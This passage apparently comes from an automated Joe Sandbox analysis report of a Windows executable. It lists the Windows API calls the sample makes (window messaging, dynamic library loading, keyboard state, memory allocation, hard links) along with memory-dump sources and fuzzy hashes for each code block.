                                        • SendMessageW.USER32(00000402,00000000,00000000), ref: 00378D80
                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00378DC1
                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00378DE9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 3feede90baa96e8cea0ead5470dcf6e6ec971245ac380ad2bf70dc11bcc2d56c
                                        • Instruction ID: 23ce029a15110725057a57b369b19ae7721f68a84acab9e2ef851584df54d9db
                                        • Opcode Fuzzy Hash: 3feede90baa96e8cea0ead5470dcf6e6ec971245ac380ad2bf70dc11bcc2d56c
                                        • Instruction Fuzzy Hash: 04213675210511EFD722EB14ED89D6ABBE9FF49310B418551E9099F6B1CB30FC50CB90
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0038A27B
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0038A290
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0038A29D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: 174224110211c8020850c1588b559aefc16a499991b15cf621fd868bbb07f2e0
                                        • Instruction ID: db74965e67e7ea05a63df73e92cb68b075d67ea8e3bf02338008463f297cae84
                                        • Opcode Fuzzy Hash: 174224110211c8020850c1588b559aefc16a499991b15cf621fd868bbb07f2e0
                                        • Instruction Fuzzy Hash: 6711E371204708BBEB266F65CC46FA73BADEF89B54F024619FA45A60D0D272A851CB60
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 003894A6
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003894B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: @U=u$edit
                                        • API String ID: 2978978980-590756393
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0035C5E5
                                        Strings
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 1456604079-2258501812
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 0035C4E1
                                        Strings
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 1456604079-2258501812
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 0035C562
                                        Strings
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 1456604079-2258501812
                                        APIs
                                        • GetForegroundWindow.USER32(?,003E1810,00390327,000000FC,?,00000000,00000000,?,?,?,0039F381,?,?,?,?,?), ref: 0038D786
                                        • GetFocus.USER32 ref: 0038D78E
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 0038D800
                                        Strings
                                        Similarity
                                        • API ID: Window$Long$FocusForegroundMessageSend
                                        • String ID: @U=u
                                        • API String ID: 3601265619-2594219639
                                        APIs
                                          • Part of subcall function 0032193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00321952
                                        • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00321AA1
                                        • GetParent.USER32(?), ref: 00392528
                                        • InvalidateRect.USER32(00000000,?,00321A74,?,00000000,00000001), ref: 0039252F
                                        Strings
                                        Similarity
                                        • API ID: MessageSend$InvalidateParentRectTimeout
                                        • String ID: @U=u
                                        • API String ID: 3648793173-2594219639
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,00342F11,00000000), ref: 00342F79
                                        • GetProcAddress.KERNEL32(00000000), ref: 00342F80
                                        Strings
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RoInitialize$combase.dll
                                        • API String ID: 2574300362-340411864
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00342F4E), ref: 0034304E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00343055
                                        Strings
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RoUninitialize$combase.dll
                                        • API String ID: 2574300362-2819208100
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: LocalTime__swprintf
                                        • String ID: %.3d$WIN_XPe
                                        • API String ID: 2070861257-2409531811
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,003820EC,?,0037F751), ref: 00382104
                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00382116
                                        Strings
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetProcessId$kernel32.dll
                                        • API String ID: 2574300362-399901964
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0033E69C,?,0033E43F), ref: 0033E6B4
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0033E6C6
                                        Strings
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                        • API String ID: 2574300362-192647395
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0033E6D9,0000000C,0033E55B,003BDC28,?,?), ref: 0033E6F1
                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0033E703
                                        Strings
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: IsWow64Process$kernel32.dll
                                        • API String ID: 2574300362-3024904723
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0037EBAF,?,0037EAAC), ref: 0037EBC7
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0037EBD9
                                        Strings
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                        • API String ID: 2574300362-1816364905
                                        • Opcode ID: adc0010e6495c55a8dc9fcd264208151f908b2bea02959807c2cd2faaccf3c0e
                                        • Instruction ID: 4f50a243f7942dad0fa9a3c080cab4cd92e0e8b9d8dd8e1817bf3d0fd59fa880
                                        • Opcode Fuzzy Hash: adc0010e6495c55a8dc9fcd264208151f908b2bea02959807c2cd2faaccf3c0e
                                        • Instruction Fuzzy Hash: 84D0A9755083128FD7321F72F848A823BE8AB18304F21C46EF89BE2650DBB4D8808A60
                                        APIs
                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,0036135F,?,00361440), ref: 00361389
                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 0036139B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                        • API String ID: 2574300362-1071820185
                                        • Opcode ID: ef63d8003064bdecd4b8c3e265467d9944918b34506881749a1badc08055dc81
                                        • Instruction ID: 90dc5e5817c95d21b9ecef0c685d058b5a6381dbc4d1c89bdedfd6fb0a862604
                                        • Opcode Fuzzy Hash: ef63d8003064bdecd4b8c3e265467d9944918b34506881749a1badc08055dc81
                                        • Instruction Fuzzy Hash: A6D0A9399003129FD7220F64F80878236E8AF04308F29882AE487D2B50DAB0C8808B50
                                        APIs
                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00361371,?,00361519), ref: 003613B4
                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 003613C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                        • API String ID: 2574300362-1587604923
                                        • Opcode ID: 356b29e328ff36365d12bcbeb2ca440be1cf906ad933fdf570ac18bfb2b0361c
                                        • Instruction ID: b239c564428832e1eac0f4da47c2687b2a2f0e9286b362b882c3842f4627e6ba
                                        • Opcode Fuzzy Hash: 356b29e328ff36365d12bcbeb2ca440be1cf906ad933fdf570ac18bfb2b0361c
                                        • Instruction Fuzzy Hash: 99D0A939A043129FD7230F64F80868236ECAB42304F25882AE497D2B68DAB0C8808B50
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00383AC2,?,003829F5), ref: 00383ADA
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00383AEC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2574300362-4033151799
                                        • Opcode ID: ebe6409b6fa5f2e8805300660683d8bb065e345448808f9b3acda5ad2f909761
                                        • Instruction ID: 1c164932cb4155f1f7f4d8dfafba78425c4836af6dc10440323651e42f8ef905
                                        • Opcode Fuzzy Hash: ebe6409b6fa5f2e8805300660683d8bb065e345448808f9b3acda5ad2f909761
                                        • Instruction Fuzzy Hash: 77D0C9716007139FD766AF65F80D68276E8AF16B15F11446AE4E7E2B50EFF4C8808B50
                                        APIs
                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00376AA6), ref: 0032AB2D
                                        • _wcscmp.LIBCMT ref: 0032AB49
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper_wcscmp
                                        • String ID:
                                        • API String ID: 820872866-0
                                        • Opcode ID: a89a8e0fd6b5989ea6afceed591910e205b289d2b02aebfea35a2aeba23b7492
                                        • Instruction ID: e04a4a031c98ea93c51c19831d1a5b038cd6a534bf0c4de1d440f7b9a428aa14
                                        • Opcode Fuzzy Hash: a89a8e0fd6b5989ea6afceed591910e205b289d2b02aebfea35a2aeba23b7492
                                        • Instruction Fuzzy Hash: C9A10470B00926DBDB16DF64F98166EBBA5FF48300F61456AEC56C7290EB309861CB82
                                        APIs
                                        • CharLowerBuffW.USER32(?,?), ref: 00380D85
                                        • CharLowerBuffW.USER32(?,?), ref: 00380DC8
                                          • Part of subcall function 00380458: CharLowerBuffW.USER32(?,?,?,?), ref: 00380478
                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00380FB2
                                        • _memmove.LIBCMT ref: 00380FC2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                        • String ID:
                                        • API String ID: 3659485706-0
                                        • Opcode ID: 14a927787a8b005c49c9e72518b398a9bb7f4a518c524a291c570c2a9147c639
                                        • Instruction ID: f057e586820405d700aa504b11a5e40418d6ea19cb147f99169f3ed3c58de45b
                                        • Opcode Fuzzy Hash: 14a927787a8b005c49c9e72518b398a9bb7f4a518c524a291c570c2a9147c639
                                        • Instruction Fuzzy Hash: 05B19E756047008FC756EF28C88096AB7E4EF89714F1588ADF889DB352DB31ED46CB81
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 0037AF56
                                        • CoUninitialize.COMBASE ref: 0037AF61
                                          • Part of subcall function 00361050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 003610B8
                                        • VariantInit.OLEAUT32(?), ref: 0037AF6C
                                        • VariantClear.OLEAUT32(?), ref: 0037B23F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                        • String ID:
                                        • API String ID: 780911581-0
                                        • Opcode ID: 49f254a0b43f0b7103bfdc86264856e51f749b90f83cd9f66ed4ee5b3dce35e6
                                        • Instruction ID: 3c6baa1c17b174659f93ed0dfde10c675036f396e91dea307708a3a77c1cd2c5
                                        • Opcode Fuzzy Hash: 49f254a0b43f0b7103bfdc86264856e51f749b90f83cd9f66ed4ee5b3dce35e6
                                        • Instruction Fuzzy Hash: 2CA15A756047019FD722EF15C891B5AB7F4BF89320F058459F99AAB3A2CB34ED40CB82
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                        • String ID:
                                        • API String ID: 3877424927-0
                                        • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                        • Instruction ID: c61afd4fdb2fbc1c7a45ef7a9e393de8747101a3564f48cc0538d674b08f7726
                                        • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                        • Instruction Fuzzy Hash: 0A51BE34A00705DBDB268FBA88807AE77E5AF40720F258739F8659E6D1D770FE619B40
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0036EF32
                                        • GetLastError.KERNEL32(?,00000000), ref: 0036EF58
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0036EF7D
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0036EFA9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: 450fa6c8b77936d9e0f79adb2290014320e7b0f5581485c59f83dd87e3a10871
                                        • Instruction ID: 793e3254745d507af8f0a8f1a00c5fe2e7f946758db75aa4367c83871d484c59
                                        • Opcode Fuzzy Hash: 450fa6c8b77936d9e0f79adb2290014320e7b0f5581485c59f83dd87e3a10871
                                        • Instruction Fuzzy Hash: 4F414B39600621DFCB12EF15C595A49BBE5EF89720B19C088E846AF362CB34FD41CB91
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 0038D617
                                        • GetWindowRect.USER32(?,?), ref: 0038D68D
                                        • PtInRect.USER32(?,?,0038EB2C), ref: 0038D69D
                                        • MessageBeep.USER32(00000000), ref: 0038D70E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: dfe47ec306e13e217c6d406c4d4d43c9e046b4a7da56679429115adad76a77ec
                                        • Instruction ID: 18c427cbb21724006c549851454f58aadafd9aa1ca8e0f93495677ac647a212c
                                        • Opcode Fuzzy Hash: dfe47ec306e13e217c6d406c4d4d43c9e046b4a7da56679429115adad76a77ec
                                        • Instruction Fuzzy Hash: 5E416B31A00259DFCB23EF58D884BA97BF9BB49310F5981AAE409DF2D1E731E841CB50
                                        APIs
                                        • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 003644EE
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0036450A
                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0036456A
                                        • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 003645C8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: dc31568c29598ae39bb58c558ce449e3e9702311f08b360b5986158847cff7e5
                                        • Instruction ID: 2473e6fa6cdcd136568633a93884b201f2051c87ec764c29eed6eeb3382ed204
                                        • Opcode Fuzzy Hash: dc31568c29598ae39bb58c558ce449e3e9702311f08b360b5986158847cff7e5
                                        • Instruction Fuzzy Hash: 89310471E002586FEF278B6488097FE7BB99B4B310F05825AF2C3576C9C7748A48D761
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00354DE8
                                        • __isleadbyte_l.LIBCMT ref: 00354E16
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00354E44
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00354E7A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: b3237a6949572208584ddc0664307f353e629f02ce7bbccbfa0213d2b51b242f
                                        • Instruction ID: 4df42bb4ab8d90a96a921d57bdab8e0215141f4b5e393eda324c5746de498543
                                        • Opcode Fuzzy Hash: b3237a6949572208584ddc0664307f353e629f02ce7bbccbfa0213d2b51b242f
                                        • Instruction Fuzzy Hash: 1631A331600205AFDF2A8F74C846FAA7BB9FF41319F164518E8618B1B1E730D895DB90
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 00387AB6
                                          • Part of subcall function 003669C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 003669E3
                                          • Part of subcall function 003669C9: GetCurrentThreadId.KERNEL32 ref: 003669EA
                                          • Part of subcall function 003669C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 003669F1
                                        • GetCaretPos.USER32(?), ref: 00387AC7
                                        • ClientToScreen.USER32(00000000,?), ref: 00387B00
                                        • GetForegroundWindow.USER32 ref: 00387B06
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
